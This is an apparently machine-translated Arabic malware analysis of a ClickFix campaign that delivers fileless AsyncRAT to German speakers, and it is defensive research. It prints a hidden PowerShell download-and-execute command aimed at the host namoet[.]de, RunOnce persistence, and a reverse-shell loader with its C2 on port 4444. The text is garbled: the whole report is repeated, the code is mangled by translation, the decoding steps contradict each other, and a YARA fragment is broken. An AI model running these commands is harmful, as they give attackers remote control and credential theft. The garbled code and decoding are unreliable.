يتم توزيع Asyncrat بدون ملفات عبر تقنية Clickfix التي تستهدف المستخدمين الناطقين باللغة الألمانية
تستهدف حملة Asyncrat التي لا تحتوي على ملفات المستخدمين الناطقين باللغة الألمانية عبر مطالبة وهمية «أنا لست روبوتًا» تنفذ شفرة PowerShell الضارة. يتم تسليمه من خلال مواقع ذات طابع Clickfix، وهو ينتهك أدوات النظام لتحميل كود C # المشوش في الذاكرة، مما يتيح الوصول الكامل عن بُعد وسرقة بيانات الاعتماد. يستمر عبر مفاتيح التسجيل ويتصل بخادم C2 على المنفذ 4444. يجب على المؤسسات حظر نشاط PowerShell المريب وفحص الذاكرة بحثًا عن التهديدات.
ينضم Asyncrat الذي لا يحتوي على ملفات إلى مجموعة Clickfix، من خلال حملة غامضة تستند إلى PowerShell. يتم تسليم البرامج الضارة عبر مطالبة تحقق مزيفة تجذب المستخدمين إلى تنفيذ أمر ضار. استنادًا إلى التفضيلات اللغوية في مطالبة التحقق، يمكننا التأكد بثقة عالية من أن الحملة تستهدف المستخدمين الناطقين باللغة الألمانية. تنتهك السلسلة أدوات النظام الشرعية ومحمّلات C # في الذاكرة ذات السلاسل العكسية لتجنب الاكتشاف. بمجرد تنفيذه، يثبت البرنامج الضار الثبات من خلال مفاتيح التسجيل ويتصل بخادم TCP C2 البعيد على المنفذ 4444. إنه يتيح التحكم الكامل عن بُعد وسرقة بيانات الاعتماد واستخراج البيانات - كل ذلك دون إسقاط الملفات على القرص. تتضمن عمليات التخفيف حظر تنفيذ PowerShell المريب ومراقبة نشاط التسجيل ومسح الذاكرة بحثًا عن الحمولات داخل الذاكرة المستخدمة بشكل شائع في طرق التسليم المستندة إلى LOLbins.
التحليل
خلال دورة اكتشاف وإسناد البنية التحتية للمهاجم الروتيني، اكتشفنا موقعًا إلكترونيًا للتسليم تحت عنوان Clickfix.
عندما تنقر الضحية على «أنا لست روبوتًا»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها.
الأمر المنسوخ:
conhost.exe - بوويرشيل بدون رأس -w مخفي -nop -c $x =
[System.Text.Encoding]:: UTF8.getString ((استدعاء - طلب الويب - URI
'http://namoet[.]de:80/x').Content); cmd /c $x» انقر فوق إدخال هويتك!
السلسلة»اضغط على إدخال هويتك للتحقق من هويتك!«داخل الأمر، يُترجم إلى «اضغط على Enter لتأكيد هويتك!». يشير هذا إلى أن صفحة تسليم clickfix مصممة لاستهداف المستخدمين الناطقين باللغة الألمانية.
سايبر كيل تشين
تفصيل خطوة بخطوة
1. يستخدم الأمر المنسوخ أداة مساعدة للنظام، conhost، لاستدعاء powershell بثلاث علامات.
بوويرشيل -w مخفي -nop -c
- تم إخفاؤها: يخفي نافذة بوويرشيل.
- لا: لا يوجد ملف تعريف (لا يتم تحميل البرامج النصية لملف تعريف PowerShell).
-ج: يقوم بتنفيذ الأمر الذي يتبعه.
2. يقوم بتنزيل حمولة powershell من خادم بعيد.
$x = [System.Text.Encoding]:: UTF8.getString ((استدعاء طلب الويب - URI 'http://namoet[.]de:80/x').Content)
يفترض الأمر أن المحتوى عبارة عن نص مشفر UTF-8، ويقوم بفك تشفيره كسلسلة.
* يمكن العثور على محتويات الحمولة التي تم تنزيلها «x» في الملحق.
3. أخيرًا، يتم تنفيذ السلسلة التي تم فك تشفيرها باستخدام موجه أوامر Windows.
cmd /c $x
التحليل - الحمولة التي تم تنزيلها «x»
1. يقوم بإعداد الثبات
$c = 'conhost.exe --بوويرشيل بدون رأس -nop -w مخفي -c '+ [شار] 34+$myInvocation.myCommand+ [char] 34;
تعيين خاصية العنصر 'HKC U:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce '' 'windows'...
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
$f هو سلسلة base64 مجزأة، تم عكسها قبل فك التشفير.
بمجرد فك التشفير، ينتج ملف اسم أسلوب.NET أو وسيطة الدالة، تستخدم أدناه.
3. يقوم بتحميل كود C # المضمن والمبهم
<obfuscated and reversed C# code>$g = ''؛
$l = $g. إلى CharArray ()؛
[مصفوفة]:: عكسي ($l)؛
نوع الإضافة - تعريف النوع $ ($l - join «)؛
$g عبارة عن فئة C # المعكوسة، وهو عبارة عن غلاف عكسي ضار لـ .NET أو أداة تثبيت.
وهي تشمل:
مقابس TCP.
عملية التفريخ.
إعادة توجيه الإدخال/الإخراج القياسي.
وظائف الترميز.
تقوم Add-Type بتجميع هذه الفئة وتحميلها في الذاكرة.
* يمكن العثور على محتويات «$l» في الملحق.
4. ينفذ التعليمات البرمجية المضمنة
[B] ::ma ($.trim ())
تحتوي الفئة B (المحددة في فقاعة C #) على طريقة ثابتة ma ().
يتم تمرير $y (الذي تم فك تشفيره مسبقًا) كوسيطة.
اشتقاق $y
$f'ask' = '+' = gclrml'+'0v2b'+'tfm'+'blk=';
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
تفصيل هذا:
الخطوة 1: إنشاء $f
$f = 'ask=' + '=gclRML' + '0v2b' + 'tFM' + 'blk='
= 'ask==gclrml0v2btfmblk='
الخطوة 2: خذ سلسلة فرعية من الإزاحة 3 بطول 16
سلسلة فرعية $f (3,16)
= '=GCLRML0v2BtFMBL'
الخطوة 3: التحويل إلى المصفوفة والعكس
# قبل الاتجاه المعاكس: '=GCLRML0v2BtFMBL'
# بعد الاتجاه المعاكس: 'lbmftbt2v0lmrllg ='
الخطوة 4: فك تشفير Base64
السلسلة الأساسية 64: 'lbmftbt2v0lmrllg ='
تم فك الشفرة: 'namoet [.] de:44'
ماذا تفعل الحمولة؟
يقوم بتأسيس عميل TCP لـ العنوان: 4444.
يقوم بالتهيئة:
معلومات بدء العملية باستخدام:
إعادة توجيه الإدخال القياسي = صحيح
إعادة توجيه الإخراج القياسي = صحيح
خطأ قياسي في إعادة التوجيه = صحيح
استخدم ShellExecute = خطأ
إنشاء نافذة = صحيح
تطلق قذيفة.
يعيد الإخراج والخطأ إلى C2.
يستمع إلى أوامر الإدخال من C2 وينفذها على نظام الضحية.
في بعض رموز الخروج، فإنه تقتل نفسها مع getCurrentProcess () .Kill ().
الإحالة - AsyncRAT
1. استخدام بوويرشيل و conhost.exe للتنفيذ الخفي
نصيحة: T1059.001 - بوويرشيل
غالبًا ما يستخدم Asyncrat PowerShell الغامض الذي تم إطلاقه من conhost.exe أو powershell.exe مع علامات مثل -w hidden و -nop و -c لتقليل الرؤية.
في عينتنا:
conhost.exe --بوويرشيل بدون رأس -w مخفي -nop -c...
يتم ملاحظة نمط التنفيذ هذا بشكل متكرر في تسليم Asyncrat.
2. تجميع C # في الذاكرة عبر نوع الإضافة
نصيحة: T1127.001 - تجميع بعد التسليم
تشتهر شركة Asyncrat بـ تحميل وظائفها الأساسية من خلال كود C # المبهم والمعكوس، والتي يتم تجميعها بعد ذلك في الذاكرة باستخدام النوع الإضافي لـ PowerShell.
تحتوي الحمولة على:
نوع الإضافة - تعريف النوع $ ($l - join «)
[B] ::ma ($.trim ())
3. تنسيق .NET Loader ذو الهندسة العكسية
نصيحة: T1218.005 - تنفيذ الوكيل الثنائي الموقّع: rundll32
تتضمن الحمولة معالجة البايت النموذجية [] وحقن العملية و base64 C # المضمّن بتنسيق معكوس.
يتطابق منطق أداة التحميل هذه مع كيفية قيام AsyncRAT بتنظيم وتحميل الحمولات المشفرة في وقت التشغيل.
4. TCP C2 على المنفذ 4444 مع إدارة العمليات ذات النمط المتزامن
نصائح:
T1071.001 - بروتوكول طبقة التطبيقات: بروتوكولات الويب
T1571 - استخدام المنفذ غير القياسي
مضيف C2 هو namoet [.] de:4444، والذي يتوافق مع السلوك الافتراضي لـ AsyncRAT: اتصال TCP مستمر (غالبًا المنفذ 4444 أو ما شابه).
يحتوي رمز .NET على:
عميل TCPClient b = عميل TCPClient الجديد ()؛ b.connect (d، e)؛
...
بينما (صحيح) {c.اقرأ (...)...}
وهذا يدل على وجود قناة خلفية طويلة المدى - وهي سمة مميزة جدًا لمنطق C2 الخاص بـ AsyncRAT.
5. استمرار التسجيل مع HKCU\... \ قم بتشغيل مرة واحدة
نصيحة: T1547.001 - مفاتيح تشغيل السجل/مجلد بدء التشغيل
تحدد البرامج الضارة الثبات باستخدام: تعيين خاصية العنصر 'HKCU:\... تشغيل مرة واحدة'...
غالبًا ما تستخدم متغيرات AsyncRAT HKCU\ البرامج\ Microsoft\ Windows\ CurrentVersion\ RunOnce أو Run للاستمرار على مستوى المستخدم دون تشغيل UAC.
رسم خرائط MITRE
Activity
Description
MITRE ATT&CK ID
ATT&CK Name
Initial execution via conhost.exe with PowerShell
Executes PowerShell payload using --headless, -w hidden, -nop, -c flags to avoid detection
T1059.001
Command and Scripting Interpreter: PowerShell
Remote payload retrieval
Downloads second stage (http://namoet[.]de/x) using Invoke-WebRequest
T1105
Ingress Tool Transfer
Payload obfuscation and decoding
Reversed, base64-encoded C# payload embedded in a PowerShell string
T1027
Obfuscated Files or Information
In-memory compilation of C# code
Uses Add-Type to compile and run embedded .NET code at runtime
T1127.001
Compile After Delivery
TCP C2 connection
Maintains persistent C2 connection to attacker over TCP (port 4444)
T1071.001, T1571
Application Layer Protocol: Web Protocols, Non-Standard Port
Process management and output redirection
Redirects standard input/output for command execution and interprocess communication
T1056.001
Input Capture: Keylogging / Terminal I/O
Persistence via registry
Sets HKCU:\...\RunOnce and HKCU:\...\Windows keys with launcher commands
T1547.001
Registry Run Keys / Startup Folder
Process injection and memory manipulation (optional in loader)
Converts byte arrays to shellcode or DLL for injection
T1055.001
Process Injection
Anti-analysis / obfuscation
Reverse-order strings, dynamic decoding, reflective loading used to evade detection
T1027.002, T1140
Obfuscated Files: Reversible Encoding, Deobfuscate/Decode Files or Information
كما نعلم، نسخت صفحة تسليم clickfix أمرًا تم إلحاقه بالنص. «اضغط على إدخال هويتك للتحقق من هويتك!». عند استخدام النص الموجود في الأمر المنسوخ كنقطة محورية، اكتشفنا بنية أساسية إضافية يتحكم فيها المهاجم والتي تم استخدامها في نفس الحملة لتسليم clickfix وعمليات C2.
Indicator Type
Value
Use
IP
109.250.109[.]80
Clickfix Delivery
IP
109.250.108[.]183
Clickfix Delivery
IP
109.250.109[.]205
Clickfix Delivery
IP
109.250.110[.]222
Clickfix Delivery
IP
109.250.110[.]98
Clickfix Delivery
IP
109.250.110[.]142
Clickfix Delivery
IP
109.250.111[.]219
Clickfix Delivery
IP
109.250.111[.]186
Clickfix Delivery
IP
109.250.110[.]140
Clickfix Delivery
IP
109.250.110[.]190
Clickfix Delivery
IP
109.250.111[.]176
Clickfix Delivery
IP
109.250.110[.]228
Clickfix Delivery
IP
109.250.111[.]75
Clickfix Delivery
استنادًا إلى البنية التحتية الإضافية المكتشفة، يمكننا التأكد بثقة متوسطة من أن هذه الحملة مستمرة منذ أبريل 2025 على الأقل.
كل من ($ps_flags، $add_type، $reg1، $rev_using، $tcp_client) و
أي من ($reg2، $rev_dns، $port_4444، $connect_call)
}
التأثير
جهاز تحكم كامل عن بعد: يوفر Asyncrat للمهاجمين وصولاً كاملاً عن بُعد إلى النظام المخترق، مما يتيح تسجيل المفاتيح وترشيح الملفات وتنفيذ الأوامر عن بُعد.
سرقة بيانات الاعتماد: يمكن للبرامج الضارة استخراج بيانات الاعتماد من المتصفحات أو الذاكرة أو بيانات الجلسة المحفوظة، مما يؤدي إلى مزيد من الحركة الجانبية أو اختراق الحساب.
الثبات عبر إساءة استخدام التسجيل: من خلال الكتابة إلى HKCU\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce، تضمن البرامج الضارة تشغيلها عند تسجيل دخول المستخدم، وتنجو من عمليات إعادة التشغيل.
التهرب عبر التنفيذ داخل الذاكرة: لا تلمس الحمولات القرص أبدًا - تتم جميع عمليات التنفيذ في الذاكرة (PowerShell العاكس+C # المعكوس)، متجاوزًا اكتشاف AV التقليدي المستند إلى الملفات.
اتصالات القيادة والتحكم: يستخدم اتصالات TCP الغامضة (غالبًا عبر منافذ مثل 4444) لتصفية البيانات أو استقبال الأوامر - مما يتيح عمليات سرية طويلة المدى.
عوامل التخفيف
حظر صناديق LolBins مثل conhost.exe لبرنامج بوويرشيل: استخدم EDR أو AppLocker لمنع الاستخدام المشبوه لـ conhost.exe --headless أثناء تشغيل powershell.exe.
تجزئة الشبكة وتصفية الخروج: حظر اتصالات TCP الخارجية المعروفة أو المشبوهة (على سبيل المثال، المنفذ 4444 أو عناوين IP/النطاقات غير المعروفة)، وتطبيق الحظر المستند إلى المجال للبنية التحتية C2 المعروفة.
مراقبة التسجيل: قم بإعداد الكشف عن التغييرات التي تطرأ على المفاتيح عالية المخاطر مثل RunOnce و Windows\ win
مسح الذاكرة باستخدام YARA أو EDR: قم بتنفيذ المسح داخل الذاكرة باستخدام قواعد YARA (مثل تلك المتوفرة) لاكتشاف كود C # الغامض ومحمّلات Add Type ومنطق TCP.
وضع اللغة المقيدة في PowerShell + التسجيل: فرض وضع اللغة المقيدة في PowerShell عبر GPO aوقم بتمكين تسجيل ScriptBlock والنسخ لاكتشاف التعليمات البرمجية الغامضة أو العاكسة.
يتم توزيع Asyncrat بدون ملفات عبر تقنية Clickfix التي تستهدف المستخدمين الناطقين باللغة الألمانية
تستهدف حملة Asyncrat التي لا تحتوي على ملفات المستخدمين الناطقين باللغة الألمانية عبر مطالبة وهمية «أنا لست روبوتًا» تنفذ شفرة PowerShell الضارة. يتم تسليمه من خلال مواقع ذات طابع Clickfix، وهو ينتهك أدوات النظام لتحميل كود C # المشوش في الذاكرة، مما يتيح الوصول الكامل عن بُعد وسرقة بيانات الاعتماد. يستمر عبر مفاتيح التسجيل ويتصل بخادم C2 على المنفذ 4444. يجب على المؤسسات حظر نشاط PowerShell المريب وفحص الذاكرة بحثًا عن التهديدات.
Get the latest industry news, threats and resources.
ملخص تنفيذي
ينضم Asyncrat الذي لا يحتوي على ملفات إلى مجموعة Clickfix، من خلال حملة غامضة تستند إلى PowerShell. يتم تسليم البرامج الضارة عبر مطالبة تحقق مزيفة تجذب المستخدمين إلى تنفيذ أمر ضار. استنادًا إلى التفضيلات اللغوية في مطالبة التحقق، يمكننا التأكد بثقة عالية من أن الحملة تستهدف المستخدمين الناطقين باللغة الألمانية. تنتهك السلسلة أدوات النظام الشرعية ومحمّلات C # في الذاكرة ذات السلاسل العكسية لتجنب الاكتشاف. بمجرد تنفيذه، يثبت البرنامج الضار الثبات من خلال مفاتيح التسجيل ويتصل بخادم TCP C2 البعيد على المنفذ 4444. إنه يتيح التحكم الكامل عن بُعد وسرقة بيانات الاعتماد واستخراج البيانات - كل ذلك دون إسقاط الملفات على القرص. تتضمن عمليات التخفيف حظر تنفيذ PowerShell المريب ومراقبة نشاط التسجيل ومسح الذاكرة بحثًا عن الحمولات داخل الذاكرة المستخدمة بشكل شائع في طرق التسليم المستندة إلى LOLbins.
التحليل
خلال دورة اكتشاف وإسناد البنية التحتية للمهاجم الروتيني، اكتشفنا موقعًا إلكترونيًا للتسليم تحت عنوان Clickfix.
عندما تنقر الضحية على «أنا لست روبوتًا»، يتم نسخ الأمر إلى الحافظة، ويتم عرض التعليمات للضحية لاتباعها.
الأمر المنسوخ:
conhost.exe - بوويرشيل بدون رأس -w مخفي -nop -c $x =
[System.Text.Encoding]:: UTF8.getString ((استدعاء - طلب الويب - URI
'http://namoet[.]de:80/x').Content); cmd /c $x» انقر فوق إدخال هويتك!
السلسلة»اضغط على إدخال هويتك للتحقق من هويتك!«داخل الأمر، يُترجم إلى «اضغط على Enter لتأكيد هويتك!». يشير هذا إلى أن صفحة تسليم clickfix مصممة لاستهداف المستخدمين الناطقين باللغة الألمانية.
سايبر كيل تشين
تفصيل خطوة بخطوة
1. يستخدم الأمر المنسوخ أداة مساعدة للنظام، conhost، لاستدعاء powershell بثلاث علامات.
بوويرشيل -w مخفي -nop -c
- تم إخفاؤها: يخفي نافذة بوويرشيل.
- لا: لا يوجد ملف تعريف (لا يتم تحميل البرامج النصية لملف تعريف PowerShell).
-ج: يقوم بتنفيذ الأمر الذي يتبعه.
2. يقوم بتنزيل حمولة powershell من خادم بعيد.
$x = [System.Text.Encoding]:: UTF8.getString ((استدعاء طلب الويب - URI 'http://namoet[.]de:80/x').Content)
يفترض الأمر أن المحتوى عبارة عن نص مشفر UTF-8، ويقوم بفك تشفيره كسلسلة.
* يمكن العثور على محتويات الحمولة التي تم تنزيلها «x» في الملحق.
3. أخيرًا، يتم تنفيذ السلسلة التي تم فك تشفيرها باستخدام موجه أوامر Windows.
cmd /c $x
التحليل - الحمولة التي تم تنزيلها «x»
1. يقوم بإعداد الثبات
$c = 'conhost.exe --بوويرشيل بدون رأس -nop -w مخفي -c '+ [شار] 34+$myInvocation.myCommand+ [char] 34;
تعيين خاصية العنصر 'HKC U:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce '' 'windows'...
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
$f هو سلسلة base64 مجزأة، تم عكسها قبل فك التشفير.
بمجرد فك التشفير، ينتج ملف اسم أسلوب.NET أو وسيطة الدالة، تستخدم أدناه.
3. يقوم بتحميل كود C # المضمن والمبهم
<obfuscated and reversed C# code>$g = ''؛
$l = $g. إلى CharArray ()؛
[مصفوفة]:: عكسي ($l)؛
نوع الإضافة - تعريف النوع $ ($l - join «)؛
$g عبارة عن فئة C # المعكوسة، وهو عبارة عن غلاف عكسي ضار لـ .NET أو أداة تثبيت.
وهي تشمل:
مقابس TCP.
عملية التفريخ.
إعادة توجيه الإدخال/الإخراج القياسي.
وظائف الترميز.
تقوم Add-Type بتجميع هذه الفئة وتحميلها في الذاكرة.
* يمكن العثور على محتويات «$l» في الملحق.
4. ينفذ التعليمات البرمجية المضمنة
[B] ::ma ($.trim ())
تحتوي الفئة B (المحددة في فقاعة C #) على طريقة ثابتة ma ().
يتم تمرير $y (الذي تم فك تشفيره مسبقًا) كوسيطة.
اشتقاق $y
$f'ask' = '+' = gclrml'+'0v2b'+'tfm'+'blk=';
$d = $f. السلسلة الفرعية (3,16). إلى CharArray ()؛
[مصفوفة]:: عكسي ($d)؛
$y = [System.Text.Encoding]:: Default.getString ([System.Convert]:: من سلسلة Base64 ($d - الانضمام «))؛
تفصيل هذا:
الخطوة 1: إنشاء $f
$f = 'ask=' + '=gclRML' + '0v2b' + 'tFM' + 'blk='
= 'ask==gclrml0v2btfmblk='
الخطوة 2: خذ سلسلة فرعية من الإزاحة 3 بطول 16
سلسلة فرعية $f (3,16)
= '=GCLRML0v2BtFMBL'
الخطوة 3: التحويل إلى المصفوفة والعكس
# قبل الاتجاه المعاكس: '=GCLRML0v2BtFMBL'
# بعد الاتجاه المعاكس: 'lbmftbt2v0lmrllg ='
الخطوة 4: فك تشفير Base64
السلسلة الأساسية 64: 'lbmftbt2v0lmrllg ='
تم فك الشفرة: 'namoet [.] de:44'
ماذا تفعل الحمولة؟
يقوم بتأسيس عميل TCP لـ العنوان: 4444.
يقوم بالتهيئة:
معلومات بدء العملية باستخدام:
إعادة توجيه الإدخال القياسي = صحيح
إعادة توجيه الإخراج القياسي = صحيح
خطأ قياسي في إعادة التوجيه = صحيح
استخدم ShellExecute = خطأ
إنشاء نافذة = صحيح
تطلق قذيفة.
يعيد الإخراج والخطأ إلى C2.
يستمع إلى أوامر الإدخال من C2 وينفذها على نظام الضحية.
في بعض رموز الخروج، فإنه تقتل نفسها مع getCurrentProcess () .Kill ().
الإحالة - AsyncRAT
1. استخدام بوويرشيل و conhost.exe للتنفيذ الخفي
نصيحة: T1059.001 - بوويرشيل
غالبًا ما يستخدم Asyncrat PowerShell الغامض الذي تم إطلاقه من conhost.exe أو powershell.exe مع علامات مثل -w hidden و -nop و -c لتقليل الرؤية.
في عينتنا:
conhost.exe --بوويرشيل بدون رأس -w مخفي -nop -c...
يتم ملاحظة نمط التنفيذ هذا بشكل متكرر في تسليم Asyncrat.
2. تجميع C # في الذاكرة عبر نوع الإضافة
نصيحة: T1127.001 - تجميع بعد التسليم
تشتهر شركة Asyncrat بـ تحميل وظائفها الأساسية من خلال كود C # المبهم والمعكوس، والتي يتم تجميعها بعد ذلك في الذاكرة باستخدام النوع الإضافي لـ PowerShell.
تحتوي الحمولة على:
نوع الإضافة - تعريف النوع $ ($l - join «)
[B] ::ma ($.trim ())
3. تنسيق .NET Loader ذو الهندسة العكسية
نصيحة: T1218.005 - تنفيذ الوكيل الثنائي الموقّع: rundll32
تتضمن الحمولة معالجة البايت النموذجية [] وحقن العملية و base64 C # المضمّن بتنسيق معكوس.
يتطابق منطق أداة التحميل هذه مع كيفية قيام AsyncRAT بتنظيم وتحميل الحمولات المشفرة في وقت التشغيل.
4. TCP C2 على المنفذ 4444 مع إدارة العمليات ذات النمط المتزامن
نصائح:
T1071.001 - بروتوكول طبقة التطبيقات: بروتوكولات الويب
T1571 - استخدام المنفذ غير القياسي
مضيف C2 هو namoet [.] de:4444، والذي يتوافق مع السلوك الافتراضي لـ AsyncRAT: اتصال TCP مستمر (غالبًا المنفذ 4444 أو ما شابه).
يحتوي رمز .NET على:
عميل TCPClient b = عميل TCPClient الجديد ()؛ b.connect (d، e)؛
...
بينما (صحيح) {c.اقرأ (...)...}
وهذا يدل على وجود قناة خلفية طويلة المدى - وهي سمة مميزة جدًا لمنطق C2 الخاص بـ AsyncRAT.
5. استمرار التسجيل مع HKCU\... \ قم بتشغيل مرة واحدة
نصيحة: T1547.001 - مفاتيح تشغيل السجل/مجلد بدء التشغيل
تحدد البرامج الضارة الثبات باستخدام: تعيين خاصية العنصر 'HKCU:\... تشغيل مرة واحدة'...
غالبًا ما تستخدم متغيرات AsyncRAT HKCU\ البرامج\ Microsoft\ Windows\ CurrentVersion\ RunOnce أو Run للاستمرار على مستوى المستخدم دون تشغيل UAC.
رسم خرائط MITRE
Activity
Description
MITRE ATT&CK ID
ATT&CK Name
Initial execution via conhost.exe with PowerShell
Executes PowerShell payload using --headless, -w hidden, -nop, -c flags to avoid detection
T1059.001
Command and Scripting Interpreter: PowerShell
Remote payload retrieval
Downloads second stage (http://namoet[.]de/x) using Invoke-WebRequest
T1105
Ingress Tool Transfer
Payload obfuscation and decoding
Reversed, base64-encoded C# payload embedded in a PowerShell string
T1027
Obfuscated Files or Information
In-memory compilation of C# code
Uses Add-Type to compile and run embedded .NET code at runtime
T1127.001
Compile After Delivery
TCP C2 connection
Maintains persistent C2 connection to attacker over TCP (port 4444)
T1071.001, T1571
Application Layer Protocol: Web Protocols, Non-Standard Port
Process management and output redirection
Redirects standard input/output for command execution and interprocess communication
T1056.001
Input Capture: Keylogging / Terminal I/O
Persistence via registry
Sets HKCU:\...\RunOnce and HKCU:\...\Windows keys with launcher commands
T1547.001
Registry Run Keys / Startup Folder
Process injection and memory manipulation (optional in loader)
Converts byte arrays to shellcode or DLL for injection
T1055.001
Process Injection
Anti-analysis / obfuscation
Reverse-order strings, dynamic decoding, reflective loading used to evade detection
T1027.002, T1140
Obfuscated Files: Reversible Encoding, Deobfuscate/Decode Files or Information
كما نعلم، نسخت صفحة تسليم clickfix أمرًا تم إلحاقه بالنص. «اضغط على إدخال هويتك للتحقق من هويتك!». عند استخدام النص الموجود في الأمر المنسوخ كنقطة محورية، اكتشفنا بنية أساسية إضافية يتحكم فيها المهاجم والتي تم استخدامها في نفس الحملة لتسليم clickfix وعمليات C2.
Indicator Type
Value
Use
IP
109.250.109[.]80
Clickfix Delivery
IP
109.250.108[.]183
Clickfix Delivery
IP
109.250.109[.]205
Clickfix Delivery
IP
109.250.110[.]222
Clickfix Delivery
IP
109.250.110[.]98
Clickfix Delivery
IP
109.250.110[.]142
Clickfix Delivery
IP
109.250.111[.]219
Clickfix Delivery
IP
109.250.111[.]186
Clickfix Delivery
IP
109.250.110[.]140
Clickfix Delivery
IP
109.250.110[.]190
Clickfix Delivery
IP
109.250.111[.]176
Clickfix Delivery
IP
109.250.110[.]228
Clickfix Delivery
IP
109.250.111[.]75
Clickfix Delivery
استنادًا إلى البنية التحتية الإضافية المكتشفة، يمكننا التأكد بثقة متوسطة من أن هذه الحملة مستمرة منذ أبريل 2025 على الأقل.
كل من ($ps_flags، $add_type، $reg1، $rev_using، $tcp_client) و
أي من ($reg2، $rev_dns، $port_4444، $connect_call)
}
التأثير
جهاز تحكم كامل عن بعد: يوفر Asyncrat للمهاجمين وصولاً كاملاً عن بُعد إلى النظام المخترق، مما يتيح تسجيل المفاتيح وترشيح الملفات وتنفيذ الأوامر عن بُعد.
سرقة بيانات الاعتماد: يمكن للبرامج الضارة استخراج بيانات الاعتماد من المتصفحات أو الذاكرة أو بيانات الجلسة المحفوظة، مما يؤدي إلى مزيد من الحركة الجانبية أو اختراق الحساب.
الثبات عبر إساءة استخدام التسجيل: من خلال الكتابة إلى HKCU\ Software\ Microsoft\ Windows\ CurrentVersion\ RunOnce، تضمن البرامج الضارة تشغيلها عند تسجيل دخول المستخدم، وتنجو من عمليات إعادة التشغيل.
التهرب عبر التنفيذ داخل الذاكرة: لا تلمس الحمولات القرص أبدًا - تتم جميع عمليات التنفيذ في الذاكرة (PowerShell العاكس+C # المعكوس)، متجاوزًا اكتشاف AV التقليدي المستند إلى الملفات.
اتصالات القيادة والتحكم: يستخدم اتصالات TCP الغامضة (غالبًا عبر منافذ مثل 4444) لتصفية البيانات أو استقبال الأوامر - مما يتيح عمليات سرية طويلة المدى.
عوامل التخفيف
حظر صناديق LolBins مثل conhost.exe لبرنامج بوويرشيل: استخدم EDR أو AppLocker لمنع الاستخدام المشبوه لـ conhost.exe --headless أثناء تشغيل powershell.exe.
تجزئة الشبكة وتصفية الخروج: حظر اتصالات TCP الخارجية المعروفة أو المشبوهة (على سبيل المثال، المنفذ 4444 أو عناوين IP/النطاقات غير المعروفة)، وتطبيق الحظر المستند إلى المجال للبنية التحتية C2 المعروفة.
مراقبة التسجيل: قم بإعداد الكشف عن التغييرات التي تطرأ على المفاتيح عالية المخاطر مثل RunOnce و Windows\ win
مسح الذاكرة باستخدام YARA أو EDR: قم بتنفيذ المسح داخل الذاكرة باستخدام قواعد YARA (مثل تلك المتوفرة) لاكتشاف كود C # الغامض ومحمّلات Add Type ومنطق TCP.
وضع اللغة المقيدة في PowerShell + التسجيل: فرض وضع اللغة المقيدة في PowerShell عبر GPO aوقم بتمكين تسجيل ScriptBlock والنسخ لاكتشاف التعليمات البرمجية الغامضة أو العاكسة.